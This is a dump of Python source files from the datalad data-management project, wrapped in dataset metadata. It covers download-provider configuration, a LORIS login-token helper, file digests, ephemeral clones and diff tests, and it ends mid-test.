self._default_providers[scheme] = Provider(name=\"\", url_res=[\"%s://.*\" % scheme])\n provider = self._default_providers[scheme]\n lgr.debug(\"No dedicated provider, returning default one for %s: %s\",\n scheme, provider)\n return provider\n\n def _store_new(self, url=None, authentication_type=None,\n authenticator_class=None, url_re=None, name=None,\n credential_name=None, credential_type=None, level='user'):\n \"\"\"Stores a provider and credential config and reloads afterwards.\n\n Note\n ----\n non-interactive version of `enter_new`.\n For now non-public, pending further refactoring\n\n Parameters\n ----------\n level: str\n Where to store the config. Choices: 'user' (default), 'ds', 'site'\n\n Returns\n -------\n Provider\n The stored `Provider` as reported by reload\n \"\"\"\n\n # We don't ask user for confirmation, so for this non-interactive\n # routine require everything to be explicitly specified.\n if any(not a for a in [url, authentication_type, authenticator_class,\n url_re, name, credential_name, credential_type]):\n raise ValueError(\"All arguments must be specified\")\n\n if level not in ['user', 'ds', 'site']:\n raise ValueError(\"'level' must be one of 'user', 'ds', 'site'\")\n\n providers_dir = Path(self._get_providers_dirs()[level])\n if not providers_dir.exists():\n providers_dir.mkdir(parents=True, exist_ok=True)\n filepath = providers_dir / f\"{name}.cfg\"\n cfg = self._CONFIG_TEMPLATE.format(**locals())\n filepath.write_bytes(cfg.encode('utf-8'))\n self.reload()\n return self.get_provider(url)\n\n def enter_new(self, url=None, auth_types=[], url_re=None, name=None,\n credential_name=None, credential_type=None):\n # TODO: level/location!\n \"\"\"Create new provider and credential config\n\n If interactive, this will ask the user to enter the details (or confirm\n default choices). A dedicated config file is written at\n <user_config_dir>/providers/<name>.cfg\n\n Parameters:\n -----------\n url: str or RI\n URL this config is created for\n auth_types: list\n List of authentication types to choose from. First entry becomes\n default. 
See datalad.downloaders.providers.AUTHENTICATION_TYPES\n url_re: str\n regular expression; Once created, this config will be used for any\n matching URL; defaults to `url`\n name: str\n name for the provider; needs to be unique per user\n credential_name: str\n name for the credential; defaults to the provider's name\n credential_type: str\n credential type to use (key for datalad.downloaders.CREDENTIAL_TYPES)\n \"\"\"\n\n from datalad.ui import ui\n if url and not name:\n ri = RI(url)\n for f in ('hostname', 'name'):\n try:\n # might need sanitarization\n name = str(getattr(ri, f))\n except AttributeError:\n pass\n known_providers_by_name = {p.name: p for p in self._providers}\n providers_user_dir = self._get_providers_dirs()['user']\n while True:\n name = ui.question(\n title=\"New provider name\",\n text=\"Unique name to identify 'provider' for %s\" % url,\n default=name\n )\n filename = pathjoin(providers_user_dir, '%s.cfg' % name)\n if name in known_providers_by_name:\n if ui.yesno(\n title=\"Known provider %s\" % name,\n text=\"Provider with name %s already known. Do you want to \"\n \"use it for this session?\"\n % name,\n default=True\n ):\n return known_providers_by_name[name]\n elif path.lexists(filename):\n ui.error(\n \"File %s already exists, choose another name\" % filename)\n else:\n break\n\n if not credential_name:\n credential_name = name\n if not url_re:\n url_re = re.escape(url) if url else None\n while True:\n url_re = ui.question(\n title=\"New provider regular expression\",\n text=\"A (Python) regular expression to specify for which URLs \"\n \"this provider should be used\",\n default=url_re\n )\n if not re.match(url_re, url):\n ui.error(\"Provided regular expression doesn't match original \"\n \"url. Please re-enter\")\n # TODO: url_re of another provider might match it as well\n # I am not sure if we have any kind of \"priority\" setting ATM\n # to differentiate or to to try multiple types :-/\n else:\n break\n\n authentication_type = None\n if auth_types:\n auth_types = [\n t for t in auth_types if t in AUTHENTICATION_TYPES\n ]\n if auth_types:\n authentication_type = auth_types[0]\n\n # Setup credential\n authentication_type = ui.question(\n title=\"Authentication type\",\n text=\"What authentication type to use\",\n default=authentication_type,\n choices=sorted(AUTHENTICATION_TYPES)\n )\n authenticator_class = AUTHENTICATION_TYPES[authentication_type]\n\n # TODO: need to figure out what fields that authenticator might\n # need to have setup and ask for them here!\n\n credential_type = ui.question(\n title=\"Credential\",\n text=\"What type of credential should be used?\",\n choices=sorted(CREDENTIAL_TYPES),\n default=credential_type or getattr(authenticator_class,\n 'DEFAULT_CREDENTIAL_TYPE')\n )\n\n cfg = self._CONFIG_TEMPLATE.format(**locals())\n if ui.yesno(\n title=\"Save provider configuration file\",\n text=\"Following configuration will be written to %s:\\n%s\"\n % (filename, cfg),\n default='yes'\n ):\n # Just create a configuration file and reload the thing\n return self._store_new(url=url,\n authentication_type=authentication_type,\n authenticator_class=authenticator_class,\n url_re=url_re,\n name=name,\n credential_name=credential_name,\n credential_type=credential_type,\n level='user'\n )\n else:\n return None\n\n\n # TODO: avoid duplication somehow ;)\n # Sugarings to get easier access to downloaders\n def download(self, url, *args, **kwargs):\n return self.get_provider(url).get_downloader(url).download(url, *args, **kwargs)\n\n def fetch(self, 
url, *args, **kwargs):\n return self.get_provider(url).get_downloader(url).fetch(url, *args, **kwargs)\n\n def get_status(self, url, *args, **kwargs):\n return self.get_provider(url).get_downloader(url).get_status(url, *args, **kwargs)\n\n def needs_authentication(self, url):\n provider = self.get_provider(url, only_nondefault=True)\n if provider is None:\n return None\n return provider.authenticator is not None\n\n\n # # TODO: UNUSED?\n # def get_credentials(self, url, new=False):\n # \"\"\"Ask user to enter credentials for a provider matching url\n # \"\"\"\n # # find a match among _items\n # provider = self.get_provider(url)\n # if new or not provider:\n # rec = self._get_new_record_ui(url)\n # rec['url_re'] = \"TODO\" # present to user and ask to edit\n # name = urlparse(url).netloc\n # self._items[name] = rec\n # if ui.yesno(\"Do you want to store credentials for %s\" % name):\n # self.store_credentials()\n # else:\n # return self._items[name]\n #\n # def store_credentials(self, name):\n # # TODO: store self._items[name] in appropriate (user) creds\n # # for later reuse\n # raise NotImplementedError()\n #\n # def _get_new_record_ui(self, url):\n # # TODO: should be a dialog with the fields appropriate for this particular\n # # type of credentials\n # ui.message(\"To access %s we would need credentials.\" % url)\n # if url in self.providers:\n # ui.message(\"If you don't yet have credentials, please visit %s\"\n # % self.providers.get(url, 'credentials_url'))\n # return { 'user': ui.question(\"Username:\"),\n # 'password': ui.password() }\n" }, { "alpha_fraction": 0.5808873772621155, "alphanum_fraction": 0.5849829316139221, "avg_line_length": 28.280000686645508, "blob_id": "8b3f787fb9f2cf34dfcdf8d29f9badb1366101c2", "content_id": "3118f5b8611103fa0991a54a76ea4dca71b50e37", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1465, "license_type": "permissive", "max_line_length": 87, "num_lines": 50, "path": "/datalad/support/third/loris_token_generator.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### #\nimport sys\nimport json\n\nfrom urllib.request import (\n Request,\n urlopen,\n)\nfrom urllib.error import HTTPError\n\nfrom datalad.support.exceptions import (\n AccessDeniedError,\n)\nfrom datalad.utils import ensure_unicode\n\n\nclass LORISTokenGenerator(object):\n \"\"\"\n Generate a LORIS API token by making a request to the\n LORIS login API endpoint with the given username\n and password.\n\n url is the complete URL of the $LORIS/api/$VERSION/login\n endpoint.\n \"\"\"\n def __init__(self, url=None):\n assert(url is not None)\n self.url = url\n\n def generate_token(self, user=None, password=None):\n data = {'username': user, 'password' : password}\n encoded_data = json.dumps(data).encode('utf-8')\n\n request = Request(self.url, encoded_data)\n\n try:\n response = urlopen(request)\n except HTTPError:\n raise AccessDeniedError(\"Could not authenticate into LORIS\")\n\n str_response = ensure_unicode(response.read())\n data = json.loads(str_response)\n return data[\"token\"]\n\n" }, { "alpha_fraction": 
0.5440565347671509, "alphanum_fraction": 0.5635910034179688, "avg_line_length": 31.079999923706055, "blob_id": "3a63d083e39e2b516915d2d4bb7499d9e92a64fc", "content_id": "db6a85c4101a9945d4977996114a9bf077a3223e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2406, "license_type": "permissive", "max_line_length": 94, "num_lines": 75, "path": "/datalad/support/digests.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Provides helper to compute digests (md5 etc) on files\n\"\"\"\n\nfrom __future__ import annotations\n\nimport hashlib\nimport logging\nfrom pathlib import Path\nfrom typing import Optional\n\nfrom ..utils import auto_repr\n\nlgr = logging.getLogger('datalad.support.digests')\n\n\n@auto_repr\nclass Digester:\n \"\"\"Helper to compute multiple digests in one pass for a file\n \"\"\"\n\n # Loosely based on snippet by PM 2Ring 2014.10.23\n # http://unix.stackexchange.com/a/163769/55543\n\n # Ideally we should find an efficient way to parallelize this but\n # atm this one is sufficiently speedy\n\n DEFAULT_DIGESTS = ['md5', 'sha1', 'sha256', 'sha512']\n\n def __init__(self, digests: Optional[list[str]] = None, blocksize: int = 1 << 16) -> None:\n \"\"\"\n Parameters\n ----------\n digests : list or None\n List of any supported algorithm labels, such as md5, sha1, etc.\n If None, a default set of hashes will be computed (md5, sha1,\n sha256, sha512).\n blocksize : int\n Chunk size (in bytes) by which to consume a file.\n \"\"\"\n self._digests = digests or self.DEFAULT_DIGESTS\n self._digest_funcs = [getattr(hashlib, digest) for digest in self._digests]\n self.blocksize = blocksize\n\n @property\n def digests(self) -> list[str]:\n return self._digests\n\n def __call__(self, fpath: str | Path) -> dict[str, str]:\n \"\"\"\n fpath : str\n File path for which a checksum shall be computed.\n\n Return\n ------\n dict\n Keys are algorithm labels, and values are checksum strings\n \"\"\"\n lgr.debug(\"Estimating digests for %s\", fpath)\n digests = [x() for x in self._digest_funcs]\n with open(fpath, 'rb') as f:\n while True:\n block = f.read(self.blocksize)\n if not block:\n break\n [d.update(block) for d in digests]\n\n return {n: d.hexdigest() for n, d in zip(self.digests, digests)}\n" }, { "alpha_fraction": 0.5815602540969849, "alphanum_fraction": 0.585106372833252, "avg_line_length": 35.78260803222656, "blob_id": "eb15ffb4a37be9d872e40543fbb55630d3c99243", "content_id": "32affff4fc2fcb178da8fee1eefcd41c45f1af63", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 846, "license_type": "permissive", "max_line_length": 83, "num_lines": 23, "path": "/benchmarks/repo.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### 
### ### ##\n\"\"\"Benchmarks of the basic repos (Git/Annex) functionality\"\"\"\n\nfrom .common import (\n SampleSuperDatasetBenchmarks,\n SuprocBenchmarks,\n)\n\n\n# TODO: probably SampleSuperDatasetBenchmarks is not the best for these benchmarks\n# but we are yet to make it parametric so we could sweep through a set\n# of typical scenarios\nclass gitrepo(SampleSuperDatasetBenchmarks):\n\n def time_get_content_info(self):\n info = self.repo.get_content_info()\n assert isinstance(info, dict) # just so we do not end up with a generator\n" }, { "alpha_fraction": 0.6121391654014587, "alphanum_fraction": 0.6128793358802795, "avg_line_length": 37.32624053955078, "blob_id": "fbb9a93d197cbe8d14d266300be3b6d4971391c1", "content_id": "1c133827540e8eeb46f4556ab6e6c192e0578f17", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5404, "license_type": "permissive", "max_line_length": 79, "num_lines": 141, "path": "/datalad/core/distributed/clone_ephemeral.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\"\"\"\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport logging\n\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.exceptions import CapturedException\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.network import RI\nfrom datalad.utils import (\n Path,\n check_symlink_capability,\n rmtree,\n)\n\nfrom . import clone as mod_clone\n\n# we need to preserve the original functions to be able to call them\n# in the patch\norig_pre_annex_init_processing_ = mod_clone._pre_annex_init_processing_\norig_post_annex_init_processing_ = mod_clone._post_annex_init_processing_\n\nlgr = logging.getLogger('datalad.core.distributed.clone')\n\n\ndef _pre_annex_init_processing_(\n *,\n destds: Dataset,\n reckless: None or str,\n **kwargs\n):\n if reckless == 'ephemeral':\n # In ephemeral clones we set annex.private=true. This would prevent the\n # location itself being recorded in uuid.log. With a private repo,\n # declaring dead (see below after annex-init) seems somewhat\n # superfluous, but on the other hand:\n # If an older annex that doesn't support private yet touches the\n # repo, the entire purpose of ephemeral would be sabotaged if we did\n # not declare dead in addition. Hence, keep it regardless of annex\n # version.\n destds.config.set('annex.private', 'true', scope='local')\n\n yield from orig_pre_annex_init_processing_(\n destds=destds, reckless=reckless, **kwargs)\n\n\ndef _post_annex_init_processing_(\n *,\n destds: Dataset,\n remote: str,\n reckless: None or str,\n **kwargs\n):\n\n if reckless == 'ephemeral':\n _setup_ephemeral_annex(destds, remote)\n\n yield from orig_post_annex_init_processing_(\n destds=destds, remote=remote, reckless=reckless,\n **kwargs)\n\n\ndef _setup_ephemeral_annex(ds: Dataset, remote: str):\n # with ephemeral we declare 'here' as 'dead' right away, whenever\n # we symlink the remote's annex, since availability from 'here' should\n # not be propagated for an ephemeral clone when we publish back to\n # the remote.\n # This will cause stuff like this for a locally present annexed file:\n # % git annex whereis d1\n # whereis d1 (0 copies) failed\n # BUT this works:\n # % git annex find . --not --in here\n # % git annex find . 
--in here\n # d1\n\n # we don't want annex copy-to <remote>\n ds.config.set(\n f'remote.{remote}.annex-ignore', 'true',\n scope='local')\n ds.repo.set_remote_dead('here')\n\n if check_symlink_capability(ds.repo.dot_git / 'dl_link_test',\n ds.repo.dot_git / 'dl_target_test'):\n # symlink the annex to avoid needless copies in an ephemeral clone\n annex_dir = ds.repo.dot_git / 'annex'\n origin_annex_url = ds.config.get(f\"remote.{remote}.url\", None)\n origin_git_path = None\n if origin_annex_url:\n try:\n # Deal with file:// scheme URLs as well as plain paths.\n # If origin isn't local, we have nothing to do.\n origin_git_path = Path(RI(origin_annex_url).localpath)\n\n if not origin_git_path.is_absolute():\n # relative path would be relative to the ds, not pwd!\n origin_git_path = ds.pathobj / origin_git_path\n\n # we are local; check for a bare repo first to not mess w/\n # the path\n if GitRepo(origin_git_path, create=False).bare:\n # origin is a bare repo -> use path as is\n pass\n elif origin_git_path.name != '.git':\n origin_git_path /= '.git'\n except ValueError as e:\n CapturedException(e)\n # Note, that accessing localpath on a non-local RI throws\n # ValueError rather than resulting in an AttributeError.\n # TODO: Warning level okay or is info level sufficient?\n # Note, that setting annex-dead is independent of\n # symlinking .git/annex. It might still make sense to\n # have an ephemeral clone that doesn't propagate its avail.\n # info. Therefore don't fail altogether.\n lgr.warning(\"reckless=ephemeral mode: %s doesn't seem \"\n \"local: %s\\nno symlinks being used\",\n remote, origin_annex_url)\n if origin_git_path:\n # TODO make sure that we do not delete any unique data\n rmtree(str(annex_dir)) \\\n if not annex_dir.is_symlink() else annex_dir.unlink()\n annex_dir.symlink_to(origin_git_path / 'annex',\n target_is_directory=True)\n else:\n # TODO: What level? 
+ note, that annex-dead is independent\n lgr.warning(\"reckless=ephemeral mode: Unable to create symlinks on \"\n \"this file system.\")\n\n\ndef _apply():\n # apply patch in a function, to be able to easily patch it out\n # and turn off the patch\n lgr.debug(\n 'Apply ephemeral patch to clone.py:_pre_annex_init_processing_')\n mod_clone._pre_annex_init_processing_ = _pre_annex_init_processing_\n lgr.debug(\n 'Apply ephemeral patch to clone.py:_post_annex_init_processing_')\n mod_clone._post_annex_init_processing_ = _post_annex_init_processing_\n\n\n_apply()\n" }, { "alpha_fraction": 0.6013655662536621, "alphanum_fraction": 0.6104373335838318, "avg_line_length": 37.288848876953125, "blob_id": "1b27808031dc103966f74f31dbd297e7f6c0f104", "content_id": "6e20d54863d531dabf8749d04fdc30cfc03e77b2", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 20945, "license_type": "permissive", "max_line_length": 102, "num_lines": 547, "path": "/datalad/core/local/tests/test_diff.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil; coding: utf-8 -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"test dataset diff\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport os\nimport os.path as op\nfrom unittest.mock import patch\n\nimport datalad.utils as ut\nfrom datalad.api import (\n create,\n diff,\n save,\n)\nfrom datalad.cmd import (\n GitWitlessRunner,\n StdOutCapture,\n)\nfrom datalad.consts import PRE_INIT_COMMIT_SHA\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.exceptions import NoDatasetFound\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n OBSCURE_FILENAME,\n SkipTest,\n assert_in,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_status,\n chpwd,\n create_tree,\n eq_,\n get_deeply_nested_structure,\n has_symlink_capability,\n known_failure_githubci_win,\n neq_,\n ok_,\n with_tempfile,\n)\nfrom datalad.utils import Path\n\n\ndef test_magic_number():\n # we hard code the magic SHA1 that represents the state of a Git repo\n # prior to the first commit -- used to diff from scratch to a specific\n # commit\n # given the level of dark magic, we better test whether this stays\n # constant across Git versions (it should!)\n out = GitWitlessRunner().run(\n 'cd ./ | git hash-object --stdin -t tree',\n protocol=StdOutCapture)\n eq_(out['stdout'].strip(), PRE_INIT_COMMIT_SHA)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_repo_diff(path=None, norepo=None):\n ds = Dataset(path).create()\n assert_repo_status(ds.path)\n assert_raises(ValueError, ds.repo.diff, fr='WTF', to='MIKE')\n\n if ds.repo.is_managed_branch():\n fr_base = DEFAULT_BRANCH\n to = DEFAULT_BRANCH\n else:\n fr_base = \"HEAD\"\n to = None\n\n # no diff\n eq_(ds.repo.diff(fr_base, to), {})\n # bogus path makes no difference\n eq_(ds.repo.diff(fr_base, to, paths=['THIS']), {})\n # let's introduce a known change\n create_tree(ds.path, {'new': 'empty'})\n ds.save(to_git=True)\n assert_repo_status(ds.path)\n eq_(ds.repo.diff(fr=fr_base + '~1', to=fr_base),\n {ut.Path(ds.repo.pathobj / 'new'): {\n 'state': 'added',\n 'type': 'file',\n 
'bytesize': 5,\n 'gitshasum': '7b4d68d70fcae134d5348f5e118f5e9c9d3f05f6'}})\n # modify known file\n create_tree(ds.path, {'new': 'notempty'})\n eq_(ds.repo.diff(fr='HEAD', to=None),\n {ut.Path(ds.repo.pathobj / 'new'): {\n 'state': 'modified',\n 'type': 'file',\n # the beast is modified, but no change in shasum -> not staged\n 'gitshasum': '7b4d68d70fcae134d5348f5e118f5e9c9d3f05f6',\n 'prev_gitshasum': '7b4d68d70fcae134d5348f5e118f5e9c9d3f05f6'}})\n # per path query gives the same result\n eq_(ds.repo.diff(fr=fr_base, to=to),\n ds.repo.diff(fr=fr_base, to=to, paths=['new']))\n # also given a directory as a constraint does the same\n eq_(ds.repo.diff(fr=fr_base, to=to),\n ds.repo.diff(fr=fr_base, to=to, paths=['.']))\n # but if we give another path, it doesn't show up\n eq_(ds.repo.diff(fr=fr_base, to=to, paths=['other']), {})\n\n # make clean\n ds.save()\n assert_repo_status(ds.path)\n\n # untracked stuff\n create_tree(ds.path, {'deep': {'down': 'untracked', 'down2': 'tobeadded'}})\n # default is to report all files\n eq_(ds.repo.diff(fr='HEAD', to=None),\n {\n ut.Path(ds.repo.pathobj / 'deep' / 'down'): {\n 'state': 'untracked',\n 'type': 'file'},\n ut.Path(ds.repo.pathobj / 'deep' / 'down2'): {\n 'state': 'untracked',\n 'type': 'file'}})\n # but can be made more compact\n eq_(ds.repo.diff(fr='HEAD', to=None, untracked='normal'),\n {\n ut.Path(ds.repo.pathobj / 'deep'): {\n 'state': 'untracked',\n 'type': 'directory'}})\n\n # again a unmatching path constrained will give an empty report\n eq_(ds.repo.diff(fr='HEAD', to=None, paths=['other']), {})\n # perfect match and anything underneath will do\n eq_(ds.repo.diff(fr='HEAD', to=None, paths=['deep']),\n {\n ut.Path(ds.repo.pathobj / 'deep' / 'down'): {\n 'state': 'untracked',\n 'type': 'file'},\n ut.Path(ds.repo.pathobj / 'deep' / 'down2'): {\n 'state': 'untracked',\n 'type': 'file'}})\n\n\ndef _dirty_results(res):\n return [r for r in res if r.get('state', None) != 'clean']\n\n\n# this is an extended variant of `test_repo_diff()` above\n# that focuses on the high-level command API\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_diff(path=None, norepo=None):\n with chpwd(norepo):\n assert_raises(NoDatasetFound, diff)\n ds = Dataset(path).create()\n assert_repo_status(ds.path)\n # reports stupid revision input\n assert_result_count(\n ds.diff(fr='WTF', on_failure='ignore', result_renderer='disabled'),\n 1,\n status='impossible',\n message=\"Git reference 'WTF' invalid\")\n # no diff\n assert_result_count(_dirty_results(ds.diff(result_renderer='disabled')), 0)\n assert_result_count(\n _dirty_results(ds.diff(fr='HEAD', result_renderer='disabled')), 0)\n # bogus path makes no difference\n assert_result_count(\n _dirty_results(ds.diff(path='THIS', fr='HEAD', result_renderer='disabled')),\n 0)\n # let's introduce a known change\n create_tree(ds.path, {'new': 'empty'})\n ds.save(to_git=True)\n assert_repo_status(ds.path)\n\n if ds.repo.is_managed_branch():\n fr_base = DEFAULT_BRANCH\n to = DEFAULT_BRANCH\n else:\n fr_base = \"HEAD\"\n to = None\n\n res = _dirty_results(ds.diff(fr=fr_base + '~1', to=to, result_renderer='disabled'))\n assert_result_count(res, 1)\n assert_result_count(\n res, 1, action='diff', path=op.join(ds.path, 'new'), state='added')\n # we can also find the diff without going through the dataset explicitly\n with chpwd(ds.path):\n assert_result_count(\n _dirty_results(diff(fr=fr_base + '~1', to=to,\n result_renderer='disabled')),\n 1,\n action='diff', path=op.join(ds.path, 'new'), state='added')\n # no diff 
against HEAD\n assert_result_count(_dirty_results(ds.diff(result_renderer='disabled')), 0)\n # modify known file\n create_tree(ds.path, {'new': 'notempty'})\n res = _dirty_results(ds.diff(result_renderer='disabled'))\n assert_result_count(res, 1)\n assert_result_count(\n res, 1, action='diff', path=op.join(ds.path, 'new'),\n state='modified')\n # but if we give another path, it doesn't show up\n assert_result_count(ds.diff(path='otherpath', result_renderer='disabled'), 0)\n # giving the right path must work though\n assert_result_count(\n ds.diff(path='new', result_renderer='disabled'), 1,\n action='diff', path=op.join(ds.path, 'new'), state='modified')\n # stage changes\n ds.repo.add('.', git=True)\n # no change in diff, staged is not committed\n assert_result_count(_dirty_results(ds.diff(result_renderer='disabled')), 1)\n ds.save()\n assert_repo_status(ds.path)\n assert_result_count(_dirty_results(ds.diff(result_renderer='disabled')), 0)\n\n # untracked stuff\n create_tree(ds.path, {'deep': {'down': 'untracked', 'down2': 'tobeadded'}})\n # a plain diff should report the untracked file\n # but not directly, because the parent dir is already unknown\n res = _dirty_results(ds.diff(result_renderer='disabled'))\n assert_result_count(res, 1)\n assert_result_count(\n res, 1, state='untracked', type='directory',\n path=op.join(ds.path, 'deep'))\n # report of individual files is also possible\n assert_result_count(\n ds.diff(untracked='all', result_renderer='disabled'), 2, state='untracked',\n type='file')\n # an unmatching path will hide this result\n assert_result_count(ds.diff(path='somewhere', result_renderer='disabled'), 0)\n # perfect match and anything underneath will do\n assert_result_count(\n ds.diff(path='deep', result_renderer='disabled'), 1, state='untracked',\n path=op.join(ds.path, 'deep'),\n type='directory')\n assert_result_count(\n ds.diff(path='deep', result_renderer='disabled'), 1,\n state='untracked', path=op.join(ds.path, 'deep'))\n ds.repo.add(op.join('deep', 'down2'), git=True)\n # now the remaining file is the only untracked one\n assert_result_count(\n ds.diff(result_renderer='disabled'), 1, state='untracked',\n path=op.join(ds.path, 'deep', 'down'),\n type='file')\n\n\n@with_tempfile(mkdir=True)\ndef test_diff_recursive(path=None):\n ds = Dataset(path).create()\n sub = ds.create('sub')\n # look at the last change, and confirm a dataset was added\n res = ds.diff(fr=DEFAULT_BRANCH + '~1', to=DEFAULT_BRANCH,\n result_renderer='disabled')\n assert_result_count(\n res, 1, action='diff', state='added', path=sub.path, type='dataset')\n # now recursive\n res = ds.diff(recursive=True, fr=DEFAULT_BRANCH + '~1', to=DEFAULT_BRANCH,\n result_renderer='disabled')\n # we also get the entire diff of the subdataset from scratch\n assert_status('ok', res)\n ok_(len(res) > 3)\n # one specific test\n assert_result_count(\n res, 1, action='diff', state='added',\n path=op.join(sub.path, '.datalad', 'config'))\n\n # now we add a file to just the parent\n create_tree(\n ds.path,\n {'onefile': 'tobeadded', 'sub': {'twofile': 'tobeadded'}})\n res = ds.diff(recursive=True, untracked='all', result_renderer='disabled')\n assert_result_count(_dirty_results(res), 3)\n assert_result_count(\n res, 1,\n action='diff', state='untracked', path=op.join(ds.path, 'onefile'),\n type='file')\n assert_result_count(\n res, 1,\n action='diff', state='modified', path=sub.path, type='dataset')\n assert_result_count(\n res, 1,\n action='diff', state='untracked', path=op.join(sub.path, 'twofile'),\n type='file')\n # 
intentional save in two steps to make check below easier\n ds.save('sub', recursive=True)\n ds.save()\n assert_repo_status(ds.path)\n\n head_ref = DEFAULT_BRANCH if ds.repo.is_managed_branch() else 'HEAD'\n\n # look at the last change, only one file was added\n res = ds.diff(fr=head_ref + '~1', to=head_ref, annex='basic',\n result_renderer='disabled')\n assert_result_count(_dirty_results(res), 1)\n assert_result_count(\n res, 1,\n action='diff', state='added', path=op.join(ds.path, 'onefile'),\n type='file')\n\n # now the exact same thing with recursion, must not be different from the\n # call above\n res = ds.diff(recursive=True, fr=head_ref + '~1', to=head_ref,\n annex='basic', result_renderer='disabled')\n assert_result_count(_dirty_results(res), 1)\n # last change in parent\n assert_result_count(\n res, 1, action='diff', state='added', path=op.join(ds.path, 'onefile'),\n type='file')\n\n if ds.repo.is_managed_branch():\n raise SkipTest(\n \"Test assumption broken: https://github.com/datalad/datalad/issues/3818\")\n # one further back brings in the modified subdataset, and the added file\n # within it\n res = ds.diff(recursive=True, fr=head_ref + '~2', to=head_ref,\n annex='basic', result_renderer='disabled')\n assert_result_count(_dirty_results(res), 3)\n assert_result_count(\n res, 1,\n action='diff', state='added', path=op.join(ds.path, 'onefile'),\n type='file')\n assert_result_count(\n res, 1,\n action='diff', state='added', path=op.join(sub.path, 'twofile'),\n type='file')\n assert_result_count(\n res, 1,\n action='diff', state='modified', path=sub.path, type='dataset')\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile()\ndef test_path_diff(_path=None, linkpath=None):\n # do the setup on the real path, not the symlink, to have its\n # bugs not affect this test of status()\n ds = get_deeply_nested_structure(str(_path))\n if has_symlink_capability():\n # make it more complicated by default\n ut.Path(linkpath).symlink_to(_path, target_is_directory=True)\n path = linkpath\n else:\n path = _path\n\n ds = Dataset(path)\n if has_symlink_capability():\n assert ds.pathobj != ds.repo.pathobj\n\n plain_recursive = ds.diff(recursive=True, annex='all', result_renderer='disabled')\n # check integrity of individual reports with a focus on how symlinks\n # are reported\n for res in plain_recursive:\n # anything that is an \"intended\" symlink should be reported\n # as such. In contrast, anything that is a symlink for mere\n # technical reasons (annex using it for something in some mode)\n # should be reported as the thing it is representing (i.e.\n # a file)\n if 'link2' in str(res['path']):\n assert res['type'] == 'symlink', res\n else:\n assert res['type'] != 'symlink', res\n # every item must report its parent dataset\n assert_in('parentds', res)\n\n # bunch of smoke tests\n # query of '.' 
is same as no path\n eq_(plain_recursive, ds.diff(path='.', recursive=True, annex='all',\n result_renderer='disabled'))\n # duplicate paths do not change things\n eq_(plain_recursive, ds.diff(path=['.', '.'], recursive=True, annex='all',\n result_renderer='disabled'))\n # neither do nested paths\n if not \"2.24.0\" <= ds.repo.git_version < \"2.25.0\":\n # Release 2.24.0 contained a regression that was fixed with 072a231016\n # (2019-12-10).\n eq_(plain_recursive,\n ds.diff(path=['.', 'subds_modified'], recursive=True, annex='all',\n result_renderer='disabled'))\n # when invoked in a subdir of a dataset it still reports on the full thing\n # just like `git status`, as long as there are no paths specified\n with chpwd(op.join(path, 'directory_untracked')):\n plain_recursive = diff(recursive=True, annex='all',\n result_renderer='disabled')\n # should be able to take absolute paths and yield the same\n # output\n eq_(plain_recursive, ds.diff(path=ds.path, recursive=True, annex='all',\n result_renderer='disabled'))\n\n # query for a deeply nested path from the top, should just work with a\n # variety of approaches\n rpath = op.join('subds_modified', 'subds_lvl1_modified',\n u'{}_directory_untracked'.format(OBSCURE_FILENAME))\n apathobj = ds.pathobj / rpath\n apath = str(apathobj)\n for p in (rpath, apath, None):\n if p is None:\n # change into the realpath of the dataset and\n # query with an explicit path\n with chpwd(ds.path):\n res = ds.diff(\n path=op.join('.', rpath),\n recursive=True,\n annex='all', result_renderer='disabled')\n else:\n res = ds.diff(\n path=p,\n recursive=True,\n annex='all', result_renderer='disabled')\n assert_result_count(\n res,\n 1,\n 